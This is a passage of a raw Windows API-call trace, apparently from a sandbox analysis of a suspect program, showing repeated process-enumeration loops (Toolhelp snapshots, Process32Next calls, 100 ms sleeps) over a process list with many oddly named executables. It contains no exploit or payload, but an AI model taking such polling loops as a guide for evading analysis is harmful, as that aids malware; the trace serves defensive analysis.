lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0071.776] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0071.776] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0071.777] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0071.777] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0071.777] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0071.778] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0071.778] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.779] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0071.779] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.780] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0071.780] CloseHandle (hObject=0xaac) returned 1 [0071.780] Sleep (dwMilliseconds=0x64) [0071.878] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0071.881] Process32First (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0071.882] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0071.882] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0071.882] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.883] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0071.883] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0071.884] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0071.884] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0071.885] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0071.885] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0071.885] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.886] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.886] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.887] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.887] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.887] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0071.888] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.888] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.889] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0071.889] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0071.890] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0071.890] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.890] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.891] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0071.891] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0071.892] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0071.892] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0071.892] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0071.893] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0071.893] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0071.894] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0071.894] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0071.895] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0071.895] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0071.896] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0071.896] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0071.896] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0071.897] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0071.897] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0071.898] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0071.898] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0071.899] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0071.899] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0071.899] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0071.900] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0071.900] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0071.901] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0071.901] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.901] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0071.902] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0071.902] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0071.903] CloseHandle (hObject=0xaac) returned 1 [0071.903] Sleep (dwMilliseconds=0x64) [0072.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xaac [0072.006] Process32First (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.006] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0072.007] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0072.007] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.008] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0072.008] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.008] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0072.009] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0072.009] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0072.010] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0072.010] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.010] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.011] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.011] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.012] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.012] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0072.012] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.015] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.015] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0072.016] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0072.016] Process32Next (in: hSnapshot=0xaac, lppe=0x6dafa30 | out: lppe=0x6dafa30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, 